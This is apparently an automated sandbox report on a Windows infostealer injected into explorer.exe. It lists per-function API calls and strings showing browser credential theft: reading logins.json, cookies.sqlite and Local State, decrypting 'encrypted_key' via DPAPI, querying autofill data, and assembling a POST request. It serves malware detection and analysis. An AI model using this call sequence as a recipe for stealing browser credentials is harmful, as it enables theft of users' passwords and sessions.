                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 02753F0A
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 02753F16
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62CC), ref: 02753F38
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62D0), ref: 02753F4C
                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02753F69
                                                                                                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 02753F7E
                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02753F9B
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 02753FB5
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 02753FC4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                        • String ID: *.*$Local State
                                                                                                                                        • API String ID: 3923353463-3324723383
                                                                                                                                        • Opcode ID: f8422cb1066c3ba408670ae3e47d00ec6f0f1c94fa0f41eed739c026918003d9
                                                                                                                                        • Instruction ID: 78c2961f85f7a30c77106a3e8c020ca31cb03a42af05d742ad0be1034b68042a
                                                                                                                                        • Opcode Fuzzy Hash: f8422cb1066c3ba408670ae3e47d00ec6f0f1c94fa0f41eed739c026918003d9
                                                                                                                                        • Instruction Fuzzy Hash: F921C1316402246BEB11A630DC0CE2BBBADDFC27A6B484929BC16C21D0EBB484598A61

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 02752B3D
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62CC), ref: 02752B63
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62D0), ref: 02752B7B
                                                                                                                                          • Part of subcall function 027519B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02752CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027519C4
                                                                                                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 02752BE7
                                                                                                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 02752C16
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 02752C43
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 02752C52
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                                        • API String ID: 1108783765-3717368146
                                                                                                                                        • Opcode ID: be09314ac81a54f6077f8216aae7d778670d4e532b533d4c4ffb66e6bb21966c
                                                                                                                                        • Instruction ID: 29c6d7afb15d10190f610193618ade29a69d2a622e71594f7b914f31cf220ab7
                                                                                                                                        • Opcode Fuzzy Hash: be09314ac81a54f6077f8216aae7d778670d4e532b533d4c4ffb66e6bb21966c
                                                                                                                                        • Instruction Fuzzy Hash: 6731B6307043654B9F15AB309C58A3FF79EAFC4711B48492CAD4AD2282EBB9C9069A51

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 027519B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02752CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027519C4
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 02751DA9
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62CC), ref: 02751DCF
                                                                                                                                        • lstrcmpiW.KERNEL32(?,027A62D0), ref: 02751DE7
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 02751E62
                                                                                                                                          • Part of subcall function 02751CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,02752C27), ref: 02751D02
                                                                                                                                          • Part of subcall function 02751CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02751D0D
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 02751E94
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 02751EA3
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                        • String ID: *.*$\*.*
                                                                                                                                        • API String ID: 232625764-1692270452
                                                                                                                                        • Opcode ID: 1f8e75a7e0d04635a4552e78ef261ca206badf35bd2f9344fec50d25e8161dfc
                                                                                                                                        • Instruction ID: dcc575b86cb22a93929c0030e34f9ac5b0f5a808776a7492694ed199b229deff
                                                                                                                                        • Opcode Fuzzy Hash: 1f8e75a7e0d04635a4552e78ef261ca206badf35bd2f9344fec50d25e8161dfc
                                                                                                                                        • Instruction Fuzzy Hash: F631A6307043615BDB11EB308898B7FF7EE9FC4353F444A29ED4E92240EBF588458A52

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
                                                                                                                                          • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
                                                                                                                                          • Part of subcall function 02751C31: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02753E1E,00000000,?,02753FA8), ref: 02751C46
  • Part of subcall function 02751C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,02753FA8), ref: 02751C56
  • Part of subcall function 02751C31: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,02753FA8), ref: 02751C76
  • Part of subcall function 02751C31: CloseHandle.KERNEL32(00000000,?,02753FA8), ref: 02751C91
  • Part of subcall function 02752FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":",00000000,00000000,00000000,02753E30,00000000,00000000,?,02753FA8), ref: 02752FC1
  • Part of subcall function 02752FB1: lstrlen.KERNEL32("encrypted_key":",?,02753FA8), ref: 02752FCE
  • Part of subcall function 02752FB1: StrStrIA.SHLWAPI("encrypted_key":",027A692C,?,02753FA8), ref: 02752FDD
  • Part of subcall function 0275123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02753E4B,00000000), ref: 0275124A
  • Part of subcall function 0275123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02751268
  • Part of subcall function 0275123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02751295
• RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 02753E74
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02753E9E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
• String ID: $DPAP$DPAP$IDPAP
• API String ID: 3076719866-957854035
• Opcode ID: 643df28d065a2fdabc9d894588f02bfdc3057c687e44f8f2d24fb40103b65585
• Instruction ID: 45bec016adf037668c845d5b31801e31f6ffacd0288bd6cef657d847eefd116a
• Opcode Fuzzy Hash: 643df28d065a2fdabc9d894588f02bfdc3057c687e44f8f2d24fb40103b65585
• Instruction Fuzzy Hash: 5021F3726043655BD712EA688C90A7FF2DDAF84740F840A6DEC48D7240EBF4CD088BD2
APIs
  • Part of subcall function 02751162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0275116F
• RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02754BB6
• NtUnmapViewOfSection.NTDLL(000000FF), ref: 02754BBF
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: MemoryMoveQuerySectionUnmapViewVirtual
• String ID:
• API String ID: 1675517319-0
• Opcode ID: a7432630ee063868ada6eba58da06871d4f221a1211bad0c571ca83be92d0de4
• Instruction ID: a76af23f17f165e381718528495a01f162738b2c407ff24140ed873b91b9a7e5
• Opcode Fuzzy Hash: a7432630ee063868ada6eba58da06871d4f221a1211bad0c571ca83be92d0de4
• Instruction Fuzzy Hash: 98E0D8359016306BCF597F30BC2CF4BBB5E9FC1371F10C914A959920C0CBB14480CA50
APIs
• GetSystemInfo.KERNEL32(027B20A4,00000001,00000000,0000000A,027A3127,027528DA,00000000,?), ref: 0275BFFC
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
• Opcode ID: 30725753146968534689755362786fe908103ca65a984deb58e3d3cc109bb444
• Instruction ID: 40f93b1dfceceb243625fb59e311f5bd4af2345d467f3c6f48edb4c690067173
• Opcode Fuzzy Hash: 30725753146968534689755362786fe908103ca65a984deb58e3d3cc109bb444
• Instruction Fuzzy Hash: 47E092717C433030F61336B86C1BF9A9A4E4F81F00FE04915FF1AA80CCCBD994404A26

Control-flow Graph

APIs
  • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
  • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
  • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
  • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
• GetTempPathW.KERNEL32(00000104,00000000), ref: 02753C6A
• GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02753C76
• DeleteFileW.KERNEL32(00000000), ref: 02753C7D
• CopyFileW.KERNEL32(?,00000000,00000000), ref: 02753C89
• lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 02753D2F
• lstrlen.KERNEL32(00000000), ref: 02753D36
• wsprintfA.USER32 ref: 02753D55
• lstrlen.KERNEL32(00000000), ref: 02753D61
• lstrcat.KERNEL32(00000000,?), ref: 02753D89
• lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02753DB2
• DeleteFileW.KERNEL32(00000000,00000000,?), ref: 02753DED
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
• String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
• API String ID: 2923052733-3488123210
• Opcode ID: 9ce002a9e8abd319a00dddc938ddba9a7ebe82fc7378c12f5052e68654dca593
• Instruction ID: 6ccc5daadeb4d377f4b6e5d926790ba1cc8d752c224e32aa6510134f2d55c558
• Opcode Fuzzy Hash: 9ce002a9e8abd319a00dddc938ddba9a7ebe82fc7378c12f5052e68654dca593
• Instruction Fuzzy Hash: E341B231604321ABD712AB75CC88E3FBBAEAFC5795F44496CFC4AA2151DB75C8018B62

Control-flow Graph

APIs
• DeleteFileW.KERNEL32(00000000,00000000,?), ref: 02752AD2
  • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
  • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
• lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 027529E1
• lstrlen.KERNEL32(00000000), ref: 027529EC
• wsprintfA.USER32 ref: 02752A38
• lstrlen.KERNEL32(00000000), ref: 02752A44
• lstrcat.KERNEL32(00000000,00000000), ref: 02752A6C
• lstrlen.KERNEL32(00000000,?,?), ref: 02752A99
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
• String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
• API String ID: 304071051-2605711689
• Opcode ID: cc9a511a59ed76a60c4402e10913f1ff5b6642b264de3f9213f570a69d243f8b
• Instruction ID: a4ba354b24cae671f05fca9275f407e16f08bb0d74391a943d8edb20a5b07744
• Opcode Fuzzy Hash: cc9a511a59ed76a60c4402e10913f1ff5b6642b264de3f9213f570a69d243f8b
• Instruction Fuzzy Hash: B351A1306043564BDB26EF309854B3FB7DAAFC5705F44482DFC89A7252DB75D8058B52

Control-flow Graph

APIs
  • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
  • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
  • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
  • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
  • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
  • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
  • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
  • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
• GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 02752D13
• StrStrIW.SHLWAPI(00000000,Profile), ref: 02752D45
• GetPrivateProfileStringW.KERNEL32(00000000,Path,027A637C,?,00000FFF,?), ref: 02752D68
• GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 02752D7B
• lstrlenW.KERNEL32(00000000), ref: 02752DD8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
• String ID: IsRelative$Path$Profile$profiles.ini
• API String ID: 2234428054-4107377610
• Opcode ID: 22de6d4eb863e5c9146fe75a4ae211fe3b6cec6a97259710ec6dcade1479ac82
• Instruction ID: aadf32fba26ea5bf9e544db5dfc01b3276b51e4df7f504425f3587a99c229d58
• Opcode Fuzzy Hash: 22de6d4eb863e5c9146fe75a4ae211fe3b6cec6a97259710ec6dcade1479ac82
• Instruction Fuzzy Hash: 0A31C2307443215BDA15AF31985473FF7A7AFC4711F44442EED0AA7282EBF588428B92

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 576 2751333-2751385 call 2751000 call 275106c call 27512a3 583 2751387-275139e 576->583 584 27513a0-27513a3 576->584 587 27513b0-27513b2 583->587 586 27513aa-27513ac 584->586 586->587 588 27513b8-27513ef RtlZeroMemory 587->588 589 27515cb-27515da call 2751011 587->589 593 27513f5-275141a 588->593 594 27515c3-27515ca 588->594 597 2751420-2751456 call 27510b1 593->597 598 27515bf 593->598 594->589 601 275145d-2751478 597->601 602 2751458 597->602 598->594 604 27515b5 601->604 605 275147e-2751483 601->605 602->601 604->598 606 2751485-2751496 605->606 607 275149d-27514c7 call 2751000 wsprintfW 605->607 606->607 610 27514e0-2751509 607->610 611 27514c9-27514cb 607->611 618 27515a5 610->618 619 275150f-275151b 610->619 612 27514cc-27514cf 611->612 614 27514d1-27514d6 612->614 615 27514da-27514dc 612->615 614->612 616 27514d8 614->616 615->610 616->610 621 27515ac-27515b0 call 2751011 618->621 619->618 622 2751521-2751537 call 2751000 619->622 621->604 626 2751539-2751544 622->626 627 2751546-2751553 call 275102f 626->627 628 2751558-275156f 626->628 627->628 632 2751571 628->632 633 2751573-275157d 628->633 632->633 633->626 634 275157f-2751583 633->634 635 2751585 call 275104c 634->635 636 275159a-27515a1 call 2751011 634->636 639 275158a-2751594 RtlMoveMemory 635->639 636->618 639->636
APIs
  • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
  • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
  • Part of subcall function 0275106C: lstrlen.KERNEL32(02D7713E,00000000,00000000,00000000,02751366,74DE8A60,02D7713E,00000000), ref: 02751074
  • Part of subcall function 0275106C: MultiByteToWideChar.KERNEL32(00000000,00000000,02D7713E,00000001,00000000,00000000), ref: 02751086
  • Part of subcall function 027512A3: RtlZeroMemory.NTDLL(?,00000018), ref: 027512B5
• RtlZeroMemory.NTDLL(?,0000003C), ref: 027513C2
• wsprintfW.USER32 ref: 027514B5
• RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02751594
Strings
• Content-Type: application/x-www-form-urlencoded, xrefs: 027514FB
• Accept: */*Referer: %S, xrefs: 027514AF
• POST, xrefs: 02751465
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
• String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
• API String ID: 3833683434-704803497
• Opcode ID: feaaf7d497ac3526f395c48af897703d2d61a99115d4572c53097086d7e06442
• Instruction ID: 8da5e1cfc1277e64a7ffec97dfc8a8cbf7978e191aacd0f3fda81c34a3a5fc6a
• Opcode Fuzzy Hash: feaaf7d497ac3526f395c48af897703d2d61a99115d4572c53097086d7e06442
• Instruction Fuzzy Hash: 047168B5A08311AFDB109F24D888A2BBBEDEF88355F44492DF959D3251DBB0D904CB92

Control-flow Graph
APIs
• CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0275B31D
• MapViewOfFile.KERNEL32(?,?,00000000,?,?), ref: 0275B34F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: File$CreateMappingView
• String ID: winShmMap1$winShmMap2$winShmMap3
• API String ID: 3452162329-3826999013
• Opcode ID: 00438e8d62bc29cdc47648026274d36f2d5fa414b71102c793af29092b2128d0
• Instruction ID: c5740d178df71049915ca372d92bce685e232cabeec9c0423f93493aaa77c169
• Opcode Fuzzy Hash: 00438e8d62bc29cdc47648026274d36f2d5fa414b71102c793af29092b2128d0
• Instruction Fuzzy Hash: F251BF71600751DFDB26CF18C855B2BB7E6FB88318F10992EEC869B254DBB0E815CB61

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: memcpy$FileReadmemset
• String ID: winRead
• API String ID: 2051157613-2759563040
• Opcode ID: 0403872fd334f1f5e50b7f527b24e6ac20c2380a5f0853a7d8f0c649afaa1dc4
• Instruction ID: 6b4ae98c8cdd79bc52e49c1704a4b097e1393dc3f04d4feb6058e78a0cf2109b
• Opcode Fuzzy Hash: 0403872fd334f1f5e50b7f527b24e6ac20c2380a5f0853a7d8f0c649afaa1dc4
• Instruction Fuzzy Hash: 0431AD72604360AFC740DE68CC9899FB7E6EFC8310F845A28FD8597210D7B0ED048B92

Control-flow Graph

APIs
• StrStrIW.SHLWAPI(?,?), ref: 02752E4B
• RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 02752EE4
• RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02752F54
• RegCloseKey.KERNEL32(?), ref: 02752F62
  • Part of subcall function 027519E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A1E
  • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A3C
  • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A75
  • Part of subcall function 027519E5: RegCloseKey.KERNEL32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A98
  • Part of subcall function 02751BC5: lstrlenW.KERNEL32(00000000,00000000,?,02752E75,PathToExe,00000000,00000000), ref: 02751BCC
  • Part of subcall function 02751BC5: StrStrIW.SHLWAPI(00000000,.exe,?,02752E75,PathToExe,00000000,00000000), ref: 02751BF0
  • Part of subcall function 02751BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02752E75,PathToExe,00000000,00000000), ref: 02751C05
  • Part of subcall function 02751BC5: lstrlenW.KERNEL32(00000000,?,02752E75,PathToExe,00000000,00000000), ref: 02751C1C
  • Part of subcall function 02751AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02752E83,PathToExe,00000000,00000000), ref: 02751B16
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
• String ID: PathToExe
• API String ID: 1799103994-1982016430
• Opcode ID: 6a616e03a967c715dfb747453ca6600745c11e77cc2e9580f03282dd0a84c903
• Instruction ID: a9e620e3b70d3621b933c16c3f5a5f7073149e10b219625d2d2b1b065f2be487
• Opcode Fuzzy Hash: 6a616e03a967c715dfb747453ca6600745c11e77cc2e9580f03282dd0a84c903
• Instruction Fuzzy Hash: 67316D71604261AF9B16AF21CC18D7FBAAAEFC4750B04851DFC5997280EFB4C906CFA1

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: File_alldiv_allmul
• String ID: winTruncate1$winTruncate2
• API String ID: 3568847005-470713972
• Opcode ID: 10549e9732466ed38f6a6a931e4e9cc6bd1e476a98f7d27c07a30eb64940bd80
• Instruction ID: 678b7f5f864f868d37796b55664321a9a9b26325c5d3df6e0376ae70d4b4ad03
• Opcode Fuzzy Hash: 10549e9732466ed38f6a6a931e4e9cc6bd1e476a98f7d27c07a30eb64940bd80
• Instruction Fuzzy Hash: F421D172600225ABDF148F2DCCA4E6BB7AAEF84310F418679FD04DB245D7B5D810CBA1
APIs
  • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
  • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
• wsprintfW.USER32 ref: 02754AA2
• RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02754AC7
• RegCloseKey.KERNEL32(?), ref: 02754AD4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: Heap$AllocateCloseCreateProcesswsprintf
• String ID: %s\%08x$Software
• API String ID: 1800864259-1658101971
• Opcode ID: 504d5ded76017218c9f014676f1e4da9ac3794881dfb088128a751416e07f496
• Instruction ID: 42d3d70fdedf42e416a7e012fe966ccfb7cc8309747a0adb4d32ce5447db75bc
• Opcode Fuzzy Hash: 504d5ded76017218c9f014676f1e4da9ac3794881dfb088128a751416e07f496
• Instruction Fuzzy Hash: EC01F771A40118BFEB189F54DC4AEBFBBADEB81354B44016EF909A3140E7B05D50D664
APIs
• _alloca_probe.NTDLL ref: 0275431C
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 02754335
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02754363
• RegCloseKey.ADVAPI32(?), ref: 027543C8
  • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
  • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
  • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
  • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
  • Part of subcall function 0275418A: wsprintfW.USER32 ref: 02754212
  • Part of subcall function 02751011: GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
  • Part of subcall function 02751011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 027543B9
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
• String ID:
• API String ID: 801677237-0
• Opcode ID: 88bbcc94f2c2cc2b389a7b38a2251dbdcca15f31a5f36ec96dfbf58c4f2a08f9
• Instruction ID: 5d10823948c77eed8fd84b5278dc78f4378aa157a145f4ba4a0a23f27c9a7251
• Opcode Fuzzy Hash: 88bbcc94f2c2cc2b389a7b38a2251dbdcca15f31a5f36ec96dfbf58c4f2a08f9
• Instruction Fuzzy Hash: 0A1186B15042117FE7159F10DC59DBFB7DDEF84314F044A2DF849D2150EBB49D489A62
APIs
• memset.NTDLL ref: 0275B8D5
• CreateFileW.KERNEL32(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0275B96F
Strings
Memory Dump Source
